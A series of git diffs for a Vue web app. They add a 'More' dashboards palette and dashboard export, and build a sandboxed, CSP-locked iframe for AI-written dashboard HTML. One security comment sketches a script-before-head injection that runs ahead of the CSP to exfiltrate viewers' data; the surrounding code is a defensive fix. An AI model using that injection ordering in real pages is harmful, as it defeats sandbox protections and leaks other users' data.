 					v-else-if="view.kind === 'html' || view.kind === 'svg'"
 					:srcdoc="view.content"
-					sandbox="allow-scripts allow-popups"
+					sandbox="allow-scripts"
 					class="h-[70vh] w-full bg-surface-white"
 					title="File preview"
 				/>

--- a/frontend/src/components/shell/AppShell.vue
+++ b/frontend/src/components/shell/AppShell.vue
@@ -34,6 +34,7 @@
 			<Dialogs />
 			<SettingsDialog />
 			<JarvisCommandPalette />
+			<MoreMenu />
 			<NotifyToaster />
 			<ConfirmDialog />
 		</div>
@@ -57,6 +58,7 @@ import NotifyToaster from "@/notify/NotifyToaster.vue"
 import { needsOnboarding } from "@/onboarding/readiness.js"
 import Sidebar from "./Sidebar.vue"
 import JarvisCommandPalette from "./JarvisCommandPalette.vue"
+import MoreMenu from "./MoreMenu.vue"
 import SettingsDialog from "./SettingsDialog.vue"
 import ConfirmDialog from "./ConfirmDialog.vue"
 import OnboardingGate from "./OnboardingGate.vue"

--- a/frontend/src/components/shell/MoreMenu.vue
+++ b/frontend/src/components/shell/MoreMenu.vue
@@ -42,16 +42,17 @@
 </template>
 
 <script setup>
-// ⌘K palette (DESIGN-V3 §3.5), rebuilt on plain frappe-ui Dialog. The stock
-// CommandPalette in 0.1.278 nests a bare <template> element at its root, which
-// Vue renders as an inert native <template> - its whole Dialog subtree never
-// mounts (no [role=dialog], no errors), so ⌘K and the sidebar Search rows did
-// nothing. Same anatomy as the stock component: search input + grouped list,
-// ↑/↓/Enter keyboard navigation, Esc closes (Dialog's own handling). Opens via
-// store.paletteOpen (sidebar "Search Chat" + tail row) and the Ctrl/⌘+K
-// binding in AppShell's useShortcuts (replaces the stock component's
-// self-owned key, §14 DA-06). Empty query = nav items + 10 recent chats;
-// typing = filtered nav + server title search (D40, 300ms debounce).
+// Sidebar "More" palette — a clone-and-trim of JarvisCommandPalette.vue for
+// the overflow destinations (Dashboards today). Same Dialog anatomy, same
+// keyboard nav, same PaletteItem rows; bound to store.moreMenuOpen. Empty
+// query lists the static destinations; typing filters them and also runs the
+// server search_workspace, keeping ONLY its "dashboards" group (whose items
+// carry spa_route, not a desk route).
+//
+// NOTE (dedupe-later): this is the second palette sharing the input +
+// flatItems/activeIndex/scrollIntoView machinery with JarvisCommandPalette.
+// When a third palette appears, extract a shared usePaletteNav composable
+// rather than cloning a third time.
 import { ref, computed, watch, nextTick } from "vue"
 import { useRouter } from "vue-router"
 import { Dialog, FeatherIcon } from "frappe-ui"
@@ -63,15 +64,14 @@ const store = useShellStore()
 const router = useRouter()
 
 const open = computed({
-	get: () => store.paletteOpen,
-	set: (v) => (store.paletteOpen = v),
+	get: () => store.moreMenuOpen,
+	set: (v) => (store.moreMenuOpen = v),
 })
 
 const inputEl = ref(null)
 const listEl = ref(null)
 const searchQuery = ref("")
-const results = ref([])
-const frappeGroups = ref([])
+const serverGroups = ref([])
 const searching = ref(false)
 const activeIndex = ref(0)
 
@@ -88,80 +88,51 @@ watch(searchQuery, (q) => {
 	const query = (q || "").trim()
 	if (!query) {
 		searching.value = false
-		results.value = []
-		frappeGroups.value = []
+		serverGroups.value = []
 		return
 	}
 	searching.value = true
 	_debounce = setTimeout(async () => {
 		const seq = ++_seq
 		try {
-			// Conversation titles + the Frappe desk (records/reports) in parallel.
-			const [conv, ws] = await Promise.all([
-				apiShell.searchConversations({ search: query, page_length: 20 }),
-				apiShell.searchWorkspace({ search: query, limit: 6 }),
-			])
+			const ws = await apiShell.searchWorkspace({ search: query, limit: 6 })
 			if (seq !== _seq) return // stale response
-			results.value = (conv && conv.rows) || []
-			frappeGroups.value = (ws && ws.groups) || []
+			// Only the SPA-native dashboards group belongs in this palette.
+			serverGroups.value = ((ws && ws.groups) || []).filter((g) => g.key === "dashboards")
 		} catch (e) {
-			if (seq === _seq) {
-				results.value = []
-				frappeGroups.value = []
-			}
+			if (seq === _seq) serverGroups.value = []
 		} finally {
 			if (seq === _seq) searching.value = false
 		}
 	}, 300)
 })
 
-const navItems = computed(() => [
+const destinations = computed(() => [
 	{
-		name: "nav-new-chat",
-		label: "New Chat",
-		icon: "plus",
-		action: () => store.requestNewChat(router),
+		name: "dest-dashboards",
+		label: "Dashboards",
+		icon: "bar-chart-2",
+		action: () => router.push("/dashboards"),
 	},
-	{ name: "nav-chat", label: "Chat", icon: "message-circle", action: () => router.push({ name: "Chat" }) },
-	{ name: "nav-skills", label: "Skills", icon: "zap", action: () => router.push({ name: "SkillsList" }) },
-	{ name: "nav-macros", label: "Macros", icon: "layers", action: () => router.push({ name: "MacrosList" }) },
-	{ name: "nav-files", label: "File Box", icon: "inbox", action: () => router.push({ name: "FilesList" }) },
-	{
-		name: "nav-approvals",
-		label: "Approval Board",
-		icon: "check-square",
-		action: () => router.push({ name: "ApprovalsList" }),
-	},
-	{ name: "nav-agents", label: "Agents", icon: "cpu", action: () => router.push({ name: "AgentsList" }) },
 ])
-
-function chatItem(c) {
-	return {
-		name: c.name,
-		label: c.title || "New chat",
-		icon: "message-circle",
-		last_active_at: c.last_active_at,
-	}
-}
 
 const groups = computed(() => {
 	const q = (searchQuery.value || "").trim().toLowerCase()
 	if (!q) {
-		const out = [{ title: "Jump to", items: navItems.value }]
-		const recents = store.conversations.slice(0, 10).map(chatItem)
-		if (recents.length) out.push({ title: "Recent chats", items: recents })
-		return out
+		return [{ title: "Destinations", items: destinations.value }]
 	}
 	const out = []
-	const nav = navItems.value.filter((it) => it.label.toLowerCase().includes(q))
-	if (nav.length) out.push({ title: "Jump to", items: nav })
-	const chats = searching.value
-		? [{ name: "-loading", label: "Searching…", icon: "loader", disabled: true }]
-		: results.value.map(chatItem)
-	if (chats.length) out.push({ title: "Chats", items: chats })
-	// Frappe desk results (Lists / Records / Reports) after the chats.
-	for (const g of frappeGroups.value) {
-		if (g.items && g.items.length) out.push({ title: g.title, items: g.items })
+	const dest = destinations.value.filter((it) => it.label.toLowerCase().includes(q))
+	if (dest.length) out.push({ title: "Destinations", items: dest })
+	if (searching.value) {
+		out.push({
+			title: "Dashboards",
+			items: [{ name: "-loading", label: "Searching…", icon: "loader", disabled: true }],
+		})
+	} else {
+		for (const g of serverGroups.value) {
+			if (g.items && g.items.length) out.push({ title: g.title, items: g.items })
+		}
 	}
 	return out
 })
@@ -171,8 +142,7 @@ const flatItems = computed(() => groups.value.flatMap((g) => g.items).filter((it
 const activeItem = computed(() => flatItems.value[activeIndex.value] || null)
 const empty = computed(() => !!searchQuery.value.trim() && !searching.value && !flatItems.value.length)
 
-// Any result change (typing, search landing, conversations refresh) resets
-// the cursor to the top row.
+// Any result change (typing, search landing) resets the cursor to the top row.
 watch(groups, () => {
 	activeIndex.value = 0
 })
@@ -208,11 +178,8 @@ function select(item) {
 	if (!item || item.disabled) return
 	open.value = false
 	if (item.action) item.action()
-	// SPA-native results (search_workspace "dashboards" group) navigate in-app.
+	// Server dashboard rows carry spa_route ("/dashboards/<name>") and no route.
 	else if (item.spa_route) router.push(item.spa_route)
-	// Frappe desk records/reports open in a new tab so the chat isn't lost.
-	else if (item.route) window.open(item.route, "_blank", "noopener")
-	else router.push("/c/" + item.name)
 }
 
 // after-leave (Dialog's overlay finished its exit) - wipe for the next open.
@@ -220,8 +187,7 @@ function reset() {
 	clearTimeout(_debounce)
 	_seq++ // invalidate any in-flight search
 	searchQuery.value = ""
-	results.value = []
-	frappeGroups.value = []
+	serverGroups.value = []
 	searching.value = false
 	activeIndex.value = 0
 }

--- a/frontend/src/components/shell/Sidebar.vue
+++ b/frontend/src/components/shell/Sidebar.vue
@@ -64,14 +64,17 @@
 		</nav>
 
 		<!-- 3b. overflow destinations (Dashboards, …) — opens the MoreMenu palette.
-		     Deliberately NOT a navLinks entry: that loop binds :to/:is-active and
-		     this row is an action, not a route. -->
+		     Deliberately NOT a navLinks entry: that loop binds :to and this row is
+		     an action. But it DOES light up when the user is on one of its
+		     destinations, so a first-class page reached via More still reads as a
+		     section (not a transient action). -->
 		<nav class="flex flex-col">
 			<SidebarLink
 				label="More"
 				icon="more-horizontal"
 				class="mx-2 my-[1.5px]"
 				:is-collapsed="collapsed"
+				:is-active="onMoreDestination"
 				:on-click="() => (store.moreMenuOpen = true)"
 			/>
 		</nav>
@@ -177,6 +180,10 @@ const route = useRoute()
 const router = useRouter()
 
 const collapsed = computed(() => store.sidebarCollapsed)
+
+// The "More" overflow row lights up on any of its destinations (currently the
+// Dashboards page + detail). Extend the prefix list as destinations are added.
+const onMoreDestination = computed(() => route.path.startsWith("/dashboards"))
 function toggleCollapse() {
 	store.sidebarCollapsed = !store.sidebarCollapsed
 }

--- a/frontend/src/components/shell/Sidebar.vue
+++ b/frontend/src/components/shell/Sidebar.vue
@@ -63,6 +63,19 @@
 			</div>
 		</nav>
 
+		<!-- 3b. overflow destinations (Dashboards, …) — opens the MoreMenu palette.
+		     Deliberately NOT a navLinks entry: that loop binds :to/:is-active and
+		     this row is an action, not a route. -->
+		<nav class="flex flex-col">
+			<SidebarLink
+				label="More"
+				icon="more-horizontal"
+				class="mx-2 my-[1.5px]"
+				:is-collapsed="collapsed"
+				:on-click="() => (store.moreMenuOpen = true)"
+			/>
+		</nav>
+
 		<!-- 4. recent chats (hidden entirely when collapsed, D6) -->
 		<template v-if="!collapsed">
 			<div class="px-4 pb-2.5 pt-[11px] text-sm text-ink-gray-5">Recent chats</div>

--- a/frontend/src/composables/chatPrefill.js
+++ b/frontend/src/composables/chatPrefill.js
@@ -1,12 +1,14 @@
 import { ref } from "vue"
 
-// Cross-view hand-off for "Discuss in chat" (Skills → Review tab). A review
-// row builds a prefilled prompt about a learned pattern, stashes it here and
-// router.push("/"); ChatView consumes it ONCE on mount (and clears it on
+// Cross-view hand-off for "Discuss in chat" (Skills → Review tab, Dashboards
+// → view page). A source surface builds a prefilled prompt, stashes it here
+// and router.push("/"); ChatView consumes it ONCE on mount (and clears it on
 // EVERY mount so a stale prompt can never fire later): it starts a FRESH
 // conversation via newChat(), fills the composer, and when `autoSend` is set
-// sends the text as the user's first message in that conversation. Shape:
-//   { text: string, autoSend: true }
+// sends the text as the user's first message in that conversation. Optional
+// `context` ({doctype, name}) rides the first send as viewing context —
+// api.js#sendMessage forwards it when it carries a doctype. Shape:
+//   { text: string, autoSend: true, context?: {doctype, name} }
 export const pendingChatPrefill = ref(null)
 
 export function setChatPrefill(payload) {

--- a/frontend/src/lib/dashboardExport.js
+++ b/frontend/src/lib/dashboardExport.js
@@ -1,0 +1,74 @@
+// dashboardExport - parent-side halves of the dashboard export flow.
+// DashboardCanvas owns the postMessage plumbing (it posts {type:"export", id,
+// format, lib, pixelRatio} into the sandboxed iframe and resolves the matching
+// export:result frame); this module owns what sits around that exchange:
+//   - loadCaptureLib(): the html-to-image UMD source as a string (dynamic
+//     ?raw import so the capture lib stays out of the main chunk; injected
+//     into the iframe via script.textContent because the iframe's CSP blocks
+//     every external fetch),
+//   - downloadPng(images, title): first captured image → Blob → <a download>,
+//   - downloadPdf(images, title): captured slides → lazy jspdf → one page per
+//     slide, page size = the slide's pixel size.
+
+let _libSource = null
+export async function loadCaptureLib() {
+	if (_libSource == null) {
+		// Bare deep import is fine here - html-to-image has no exports map;
+		// dist/html-to-image.js is the UMD build that installs window.htmlToImage.
+		const mod = await import("html-to-image/dist/html-to-image.js?raw")
+		_libSource = (mod && mod.default) || ""
+	}
+	return _libSource
+}
+
+function slugify(title) {
+	return (
+		String(title || "")
+			.toLowerCase()
+			.replace(/[^a-z0-9]+/g, "-")
+			.replace(/^-+|-+$/g, "") || "dashboard"
+	)
+}
+
+function dataUrlToBlob(dataUrl) {
+	const [meta, b64] = String(dataUrl || "").split(",")
+	const mime = (/data:([^;]+)/.exec(meta) || [])[1] || "image/png"
+	const bin = atob(b64 || "")
+	const bytes = new Uint8Array(bin.length)
+	for (let i = 0; i < bin.length; i++) bytes[i] = bin.charCodeAt(i)
+	return new Blob([bytes], { type: mime })
+}
+
+// images: [{dataUrl, w, h, title}] from the iframe's export:result frame.
+export function downloadPng(images, title) {
+	const img = images && images[0]
+	if (!img || !img.dataUrl) throw new Error("Nothing was captured")
+	const url = URL.createObjectURL(dataUrlToBlob(img.dataUrl))
+	const a = document.createElement("a")
+	a.href = url
+	a.download = slugify(title) + ".png"
+	document.body.appendChild(a)
+	a.click()
+	a.remove()
+	setTimeout(() => URL.revokeObjectURL(url), 10000)
+}
+
+export async function downloadPdf(images, title) {
+	if (!images || !images.length) throw new Error("Nothing was captured")
+	// jspdf only loads when a PDF export actually happens.
+	const { jsPDF } = await import("jspdf")
+	let doc = null
+	for (const img of images) {
+		const w = Math.max(1, Math.round(img.w || 1))
+		const h = Math.max(1, Math.round(img.h || 1))
+		const orientation = w >= h ? "landscape" : "portrait"
+		if (!doc) {
+			// px_scaling: treat px as real pixels (jspdf otherwise rescales 96dpi→72).
+			doc = new jsPDF({ orientation, unit: "px", format: [w, h], hotfixes: ["px_scaling"] })
+		} else {
+			doc.addPage([w, h], orientation)
+		}
+		doc.addImage(img.dataUrl, "PNG", 0, 0, w, h)
+	}
+	doc.save(slugify(title) + ".pdf")
+}

--- a/frontend/src/lib/dashboardSrcdoc.js
+++ b/frontend/src/lib/dashboardSrcdoc.js
@@ -1,0 +1,281 @@
+// dashboardSrcdoc - pure string assembly of the sandboxed dashboard iframe's
+// srcdoc (DOM-free so `node --test` covers it). The AI's HTML (full document
+// or fragment) gets a head block injected IN ORDER:
+//   1. the CSP meta (FIRST head child - it must precede every script),
+//   2. <meta charset="utf-8"> (only when we wrap a fragment in our skeleton),
+//   3. the echarts source inline (optional - caller dynamic-imports the 1MB
+//      min build as ?raw and passes the string, keeping this util sync/pure),
+//   4. the bridge runtime inline - BEFORE any user markup, so window.jarvis
+//      exists by the time user scripts run.
+// The srcdoc iframe is sandbox="allow-scripts" with NO allow-same-origin; the
+// CSP blocks all network egress (connect-src 'none', script/style inline-only)
+// so a malicious dashboard can neither phone home nor load remote code.
+//
+// Sources contract (single source of truth): the HTML declares its data needs
+// in a <script type="application/json" id="jarvis-sources"> block; the runtime
+// parses it at boot to resolve jarvis.data("<name>") → {tool, spec}, and the
+// parent parses the SAME block (parseSourcesBlock below) for the save-dialog
+// preview + save payload.
+
+export const CSP_META =
+	'<meta http-equiv="Content-Security-Policy" content="default-src \'none\'; script-src \'unsafe-inline\'; style-src \'unsafe-inline\'; img-src data: blob:; font-src data:; connect-src \'none\'">'
+
+// ── the bridge runtime (inline JS, stringified into the srcdoc) ───────────────
+// window.jarvis API for dashboard HTML:
+//   jarvis.data(name)        → Promise; `query`/`get_list` sources resolve with
+//                              the rows array; `run_report` sources resolve
+//                              with {columns, rows}. Rejections carry .code
+//                              ("PermissionError"|"NotFound"|"Timeout"|...).
+//   jarvis.ready()           → tells the parent boot finished (auto-posted on
+//                              DOMContentLoaded too).
+//   jarvis.renderError(el,e) → quiet inline per-widget error block.
+// Frames OUT: {jarvis:1, v:1, type:"data"|"ready"|"height"|"export:result", ...}
+// Frames IN (validated e.source === window.parent && d.jarvis === 1):
+//   {type:"data:result", id, ok, rows|error} · {type:"theme", dark} ·
+//   {type:"export", id, format:"png"|"slides", lib, pixelRatio}
+export const RUNTIME_JS = `(function () {
+	"use strict";
+	var sources = {}; // name -> {tool, spec}
+	var pending = {}; // data request id -> {resolve, reject, timer}
+	var seq = 0;
+	var exportLibInjected = false;
+
+	function post(msg) {
+		msg.jarvis = 1;
+		msg.v = 1;
+		window.parent.postMessage(msg, "*");
+	}
+
+	function parseSources() {
+		var el = document.getElementById("jarvis-sources");
+		if (!el) return;
+		try {
+			var parsed = JSON.parse(el.textContent || "{}");
+			var list = (parsed && parsed.sources) || [];
+			for (var i = 0; i < list.length; i++) {
+				var s = list[i];
+				if (s && s.source_name) sources[s.source_name] = { tool: s.tool, spec: s.spec };
+			}
+		} catch (e) {
+			/* malformed block: jarvis.data() rejects per-name with NotFound */
+		}
+	}
+
+	window.jarvis = {
+		data: function (name) {
+			return new Promise(function (resolve, reject) {
+				var src = sources[name];
+				if (!src) {
+					var e = new Error('Unknown source "' + name + '"');
+					e.code = "NotFound";
+					return reject(e);
+				}
+				var id = "d" + ++seq;
+				var timer = setTimeout(function () {
+					delete pending[id];
+					var e = new Error("Timed out loading data");
+					e.code = "Timeout";
+					reject(e);
+				}, 30000);
+				pending[id] = { resolve: resolve, reject: reject, timer: timer };
+				post({ type: "data", id: id, name: name, tool: src.tool, spec: src.spec });
+			});
+		},
+		ready: function () {
+			post({ type: "ready" });
+		},
+		renderError: function (el, err) {
+			if (!el) return;
+			var msg =
+				err && err.code === "PermissionError"
+					? "No permission to view this data"
+					: "Couldn't load this data";
+			el.innerHTML = "";
+			var d = document.createElement("div");
+			d.textContent = msg;
+			d.style.cssText =
+				"font-family:system-ui,sans-serif;font-size:13px;opacity:.55;padding:12px;text-align:center;";
+			el.appendChild(d);
+		},
+	};
+
+	function captureOne(el, pixelRatio) {
+		return window.htmlToImage
+			.toPng(el, {
+				pixelRatio: pixelRatio,
+				skipFonts: true,
+				backgroundColor: getComputedStyle(document.body).backgroundColor,
+			})
+			.then(function (dataUrl) {
+				return {
+					dataUrl: dataUrl,
+					w: Math.round(el.offsetWidth * pixelRatio),
+					h: Math.round(el.offsetHeight * pixelRatio),
+					title: (el.dataset && el.dataset.title) || "",
+				};
+			});
+	}
+
+	function handleExport(d) {
+		try {
+			if (!exportLibInjected && d.lib) {
+				var s = document.createElement("script");
+				s.textContent = d.lib;
+				document.head.appendChild(s);
+				exportLibInjected = true;
+			}
+			if (!window.htmlToImage) throw new Error("capture library unavailable");
+			var els =
+				d.format === "slides"
+					? Array.prototype.slice.call(document.querySelectorAll("section.slide"))
+					: [];
+			if (!els.length) els = [document.body];
+			var pixelRatio = d.pixelRatio || 2;
+			// Browsers cap canvases near 16384px a side - drop to 1x past that.
+			for (var i = 0; i < els.length; i++) {
+				var max = Math.max(els[i].offsetWidth, els[i].offsetHeight);
+				if (max * pixelRatio > 16384) pixelRatio = 1;
+			}
+			// SEQUENTIAL captures: parallel toPng calls contend for layout/canvas.
+			var images = [];
+			var chain = Promise.resolve();
+			els.forEach(function (el) {
+				chain = chain.then(function () {
+					return captureOne(el, pixelRatio).then(function (img) {
+						images.push(img);
+					});
+				});
+			});
+			chain
+				.then(function () {
+					post({ type: "export:result", id: d.id, ok: true, images: images });
+				})
+				.catch(function (err) {
+					post({
+						type: "export:result",
+						id: d.id,
+						ok: false,
+						error: { code: "CaptureFailed", message: String((err && err.message) || err) },
+					});
+				});
+		} catch (err) {
+			post({
+				type: "export:result",
+				id: d.id,
+				ok: false,
+				error: { code: "CaptureFailed", message: String((err && err.message) || err) },
+			});
+		}
+	}
+
+	window.addEventListener("message", function (e) {
+		if (e.source !== window.parent) return;
+		var d = e.data;
+		if (!d || d.jarvis !== 1) return;
+		if (d.type === "data:result") {
+			var p = pending[d.id];
+			if (!p) return;
+			delete pending[d.id];
+			clearTimeout(p.timer);
+			if (d.ok) p.resolve(d.rows);
+			else {
+				var err = new Error((d.error && d.error.message) || "Couldn't load this data");
+				err.code = (d.error && d.error.code) || "InternalError";
+				p.reject(err);
+			}
+		} else if (d.type === "theme") {
+			document.documentElement.dataset.theme = d.dark ? "dark" : "light";
+			window.dispatchEvent(new CustomEvent("jarvis:theme", { detail: { dark: !!d.dark } }));
+		} else if (d.type === "export") {
+			handleExport(d);
+		}
+	});
+
+	function boot() {
+		parseSources();
+		if (typeof ResizeObserver !== "undefined" && document.body) {
+			new ResizeObserver(function () {
+				post({ type: "height", height: document.body.scrollHeight });
+			}).observe(document.body);
+		}
+		post({ type: "ready" });
+	}
+	if (document.readyState === "loading") document.addEventListener("DOMContentLoaded", boot);
+	else boot();
+})();`
+
+// Any JS inlined into HTML must not terminate its own <script> wrapper.
+function escInline(js) {
+	return String(js || "").replace(/<\/script/gi, "<\\/script")
+}
+
+// Ensure data-theme="dark|light" on an existing <html ...> tag (replace an
+// existing attribute, else append one).
+function setThemeAttr(src, theme) {
+	return src.replace(/<html([^>]*)>/i, (m, attrs) => {
+		if (/data-theme\s*=/i.test(attrs)) {
+			return (
+				"<html" +
+				attrs.replace(/data-theme\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/i, `data-theme="${theme}"`) +
+				">"
+			)
+		}
+		return `<html${attrs} data-theme="${theme}">`
+	})
+}
+
+// buildSrcdoc(html, {dark, echartsSource}) → the full srcdoc string.
+// Sync + pure: the caller dynamic-imports echarts.min.js?raw only when the
+// html references echarts, so the 1MB source never rides the main chunk.
+export function buildSrcdoc(html, { dark = false, echartsSource = "" } = {}) {
+	const theme = dark ? "dark" : "light"
+	const src = String(html || "")
+	const scripts =
+		(echartsSource ? `<script>${escInline(echartsSource)}<\/script>` : "") +
+		`<script>${escInline(RUNTIME_JS)}<\/script>`
+
+	// (a) full document with a <head>: inject right after the opening head tag
+	if (/<head[^>]*>/i.test(src)) {
+		return setThemeAttr(
+			src.replace(/<head[^>]*>/i, (m) => m + CSP_META + scripts),
+			theme,
+		)
+	}
+	// (b) <html> but no <head>: insert one right after the html tag
+	if (/<html[^>]*>/i.test(src)) {
+		return setThemeAttr(
+			src.replace(/<html[^>]*>/i, (m) => m + "<head>" + CSP_META + scripts + "</head>"),
+			theme,
+		)
+	}
+	// (c) fragment: strip a leading doctype and wrap the full skeleton
+	const body = src.replace(/^\s*<!doctype[^>]*>\s*/i, "")
+	return (
+		`<!DOCTYPE html><html data-theme="${theme}"><head>` +
+		CSP_META +
+		'<meta charset="utf-8">' +
+		scripts +
+		"</head><body>" +
+		body +
+		"</body></html>"
+	)
+}
+
+// Parent-side parse of the SAME #jarvis-sources block the runtime reads -
+// feeds the save dialog's detected-sources preview and the save payload.
+// String-based (no DOM) so it is testable and works on the raw html prop.
+// → [{source_name, tool, spec}]
+export function parseSourcesBlock(html) {
+	const m =
+		/<script[^>]*\bid\s*=\s*["']jarvis-sources["'][^>]*>([\s\S]*?)<\/script>/i.exec(
+			String(html || ""),
+		)
+	if (!m) return []
+	try {
+		const parsed = JSON.parse(m[1])
+		const list = (parsed && parsed.sources) || []
+		return list.filter((s) => s && s.source_name)
+	} catch (e) {
+		return []
+	}
+}

--- a/frontend/src/lib/dashboardSrcdoc.js
+++ b/frontend/src/lib/dashboardSrcdoc.js
@@ -246,24 +246,46 @@ function escInline(js) {
 	return String(js || "").replace(/<\/script/gi, "<\\/script")
 }
 
-// Ensure data-theme="dark|light" on an existing <html ...> tag (replace an
-// existing attribute, else append one).
-function setThemeAttr(src, theme) {
-	return src.replace(/<html([^>]*)>/i, (m, attrs) => {
-		if (/data-theme\s*=/i.test(attrs)) {
-			return (
-				"<html" +
-				attrs.replace(/data-theme\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/i, `data-theme="${theme}"`) +
-				">"
-			)
-		}
-		return `<html${attrs} data-theme="${theme}">`
-	})
+// Split author HTML into (headInner, bodyInner). We NEVER re-emit the author's
+// own <html>/<head>/<body> tags or anything before them — see buildSrcdoc for
+// why (CSP-ordering: markup before <head> would execute pre-CSP). Anything
+// outside the first <head> and the <body> (e.g. a <script> placed before
+// <head>) is intentionally DROPPED, not run.
+function splitAuthorHtml(src) {
+	const headM = /<head[^>]*>([\s\S]*?)<\/head>/i.exec(src)
+	const bodyM = /<body[^>]*>([\s\S]*?)<\/body>/i.exec(src)
+	if (bodyM) {
+		return { headInner: headM ? headM[1] : "", bodyInner: bodyM[1] }
+	}
+	if (headM) {
+		// <head> but no <body>: body is everything after </head>, minus a
+		// trailing </html>.
+		const after = src
+			.slice(headM.index + headM[0].length)
+			.replace(/<\/html>\s*$/i, "")
+		return { headInner: headM[1], bodyInner: after }
+	}
+	// fragment (no head/body): strip a leading doctype + any stray html tags,
+	// everything is body content.
+	const body = src
+		.replace(/^\s*<!doctype[^>]*>\s*/i, "")
+		.replace(/<\/?html[^>]*>/gi, "")
+	return { headInner: "", bodyInner: body }
 }
 
-// buildSrcdoc(html, {dark, echartsSource}) → the full srcdoc string.
+// buildSrcdoc(html, {dark, echartsSource, theme}) → the full srcdoc string.
 // Sync + pure: the caller dynamic-imports echarts.min.js?raw only when the
 // html references echarts, so the 1MB source never rides the main chunk.
+//
+// SECURITY — CSP must be the FIRST thing the parser sees. We ALWAYS emit our
+// own <!DOCTYPE html><html><head>CSP+scripts+…</head><body>author</body>
+// shell and only ever place author content INSIDE <head>/<body>, extracted
+// via splitAuthorHtml. We never reuse the author's <html>/<head>/<body> tags.
+// (Injecting CSP *inside* an author's existing <head> is unsafe: a <script>
+// placed before that <head> — e.g. `<html><script>evil</script><head>…` —
+// executes during "before head" parsing, BEFORE the CSP meta, and could open
+// a socket that survives connect-src 'none' and exfiltrate another viewer's
+// bridged data. Wrapping guarantees nothing author-supplied precedes the CSP.)
 export function buildSrcdoc(
 	html,
 	{ dark = false, echartsSource = "", theme: themeSpec = null } = {},
@@ -275,7 +297,6 @@ export function buildSrcdoc(
 	// light/dark - independent of the app shell's mode. Without a theme the
 	// legacy dark flag drives data-theme only.
 	const theme = themeSpec ? (themeSpec.dark ? "dark" : "light") : dark ? "dark" : "light"
-	const src = String(html || "")
 	const themeBlock = themeSpec
 		? `<style id="jarvis-theme">${themeSpec.css}</style>` +
 			`<script>window.JARVIS_THEME=${escInline(
@@ -293,30 +314,26 @@ export function buildSrcdoc(
 		(echartsSource ? `<script>${escInline(echartsSource)}<\/script>` : "") +
 		`<script>${escInline(RUNTIME_JS)}<\/script>`
 
-	// (a) full document with a <head>: inject right after the opening head tag
-	if (/<head[^>]*>/i.test(src)) {
-		return setThemeAttr(
-			src.replace(/<head[^>]*>/i, (m) => m + CSP_META + scripts),
-			theme,
-		)
-	}
-	// (b) <html> but no <head>: insert one right after the html tag
-	if (/<html[^>]*>/i.test(src)) {
-		return setThemeAttr(
-			src.replace(/<html[^>]*>/i, (m) => m + "<head>" + CSP_META + scripts + "</head>"),
-			theme,
-		)
-	}
-	// (c) fragment: strip a leading doctype and wrap the full skeleton
-	const body = src.replace(/^\s*<!doctype[^>]*>\s*/i, "")
+	const { headInner, bodyInner } = splitAuthorHtml(String(html || ""))
 	return (
 		`<!DOCTYPE html><html data-theme="${theme}"><head>` +
 		CSP_META +
 		'<meta charset="utf-8">' +
 		scripts +
+		stripHostClient(headInner) +
 		"</head><body>" +
-		body +
+		stripHostClient(bodyInner) +
 		"</body></html>"
+	)
+}
+
+// Dashboards saved before the gateway host-client strip landed carry a dead
+// openclaw live-reload script (a WebSocket to /__openclaw__/ws). It can't work
+// inside the sandbox (connect-src 'none' blocks it) and just logs a CSP
+// violation on every view — drop any <script> that references the host socket.
+function stripHostClient(html) {
+	return String(html || "").replace(/<script\b[\s\S]*?<\/script>/gi, (m) =>
+		m.includes("__openclaw__/ws") ? "" : m,
 	)
 }
 

--- a/frontend/src/lib/dashboardSrcdoc.js
+++ b/frontend/src/lib/dashboardSrcdoc.js
@@ -72,25 +72,43 @@ export const RUNTIME_JS = `(function () {
 		}
 	}
 
+	// Dashboard widget scripts run inline DURING document parsing - often
+	// before the #jarvis-sources block (or the rest of the DOM) exists. Defer
+	// every lookup until the document is fully parsed, then re-parse lazily,
+	// so widget/block ordering never matters.
+	function whenParsed(fn) {
+		if (document.readyState === "loading") {
+			document.addEventListener("DOMContentLoaded", fn);
+		} else {
+			fn();
+		}
+	}
+
 	window.jarvis = {
 		data: function (name) {
 			return new Promise(function (resolve, reject) {
-				var src = sources[name];
-				if (!src) {
-					var known = Object.keys(sources).join(", ") || "none declared";
-					var e = new Error('Unknown source "' + name + '" (declared: ' + known + ")");
-					e.code = "NotFound";
-					return reject(e);
-				}
-				var id = "d" + ++seq;
-				var timer = setTimeout(function () {
-					delete pending[id];
-					var e = new Error("Timed out loading data");
-					e.code = "Timeout";
-					reject(e);
-				}, 30000);
-				pending[id] = { resolve: resolve, reject: reject, timer: timer };
-				post({ type: "data", id: id, name: name, tool: src.tool, spec: src.spec });
+				whenParsed(function () {
+					var src = sources[name];
+					if (!src) {
+						parseSources();
+						src = sources[name];
+					}
+					if (!src) {
+						var known = Object.keys(sources).join(", ") || "none declared";
+						var e = new Error('Unknown source "' + name + '" (declared: ' + known + ")");
+						e.code = "NotFound";
+						return reject(e);
+					}
+					var id = "d" + ++seq;
+					var timer = setTimeout(function () {
+						delete pending[id];
+						var e = new Error("Timed out loading data");
+						e.code = "Timeout";
+						reject(e);
+					}, 30000);
+					pending[id] = { resolve: resolve, reject: reject, timer: timer };
+					post({ type: "data", id: id, name: name, tool: src.tool, spec: src.spec });
+				});
 			});
 		},
 		ready: function () {

--- a/frontend/src/lib/dashboardSrcdoc.js
+++ b/frontend/src/lib/dashboardSrcdoc.js
@@ -53,8 +53,19 @@ export const RUNTIME_JS = `(function () {
 			var parsed = JSON.parse(el.textContent || "{}");
 			var list = (parsed && parsed.sources) || [];
 			for (var i = 0; i < list.length; i++) {
+				// LLM-authored blocks drift toward the tool-call surface; fold the
+				// common dialects into the canonical {source_name, tool, spec} shape
+				// (the backend save parser normalizes identically).
 				var s = list[i];
-				if (s && s.source_name) sources[s.source_name] = { tool: s.tool, spec: s.spec };
+				if (!s) continue;
+				var name = s.source_name || s.id || s.name;
+				if (!name) continue;
+				var tool = String(s.tool || "").replace(/^jarvis__/, "");
+				var spec = s.spec;
+				if (spec == null && s.args && typeof s.args === "object") {
+					spec = s.args.spec && typeof s.args.spec === "object" ? s.args.spec : s.args;
+				}
+				sources[name] = { tool: tool, spec: spec };
 			}
 		} catch (e) {
 			/* malformed block: jarvis.data() rejects per-name with NotFound */
@@ -66,7 +77,8 @@ export const RUNTIME_JS = `(function () {
 			return new Promise(function (resolve, reject) {
 				var src = sources[name];
 				if (!src) {
-					var e = new Error('Unknown source "' + name + '"');
+					var known = Object.keys(sources).join(", ") || "none declared";
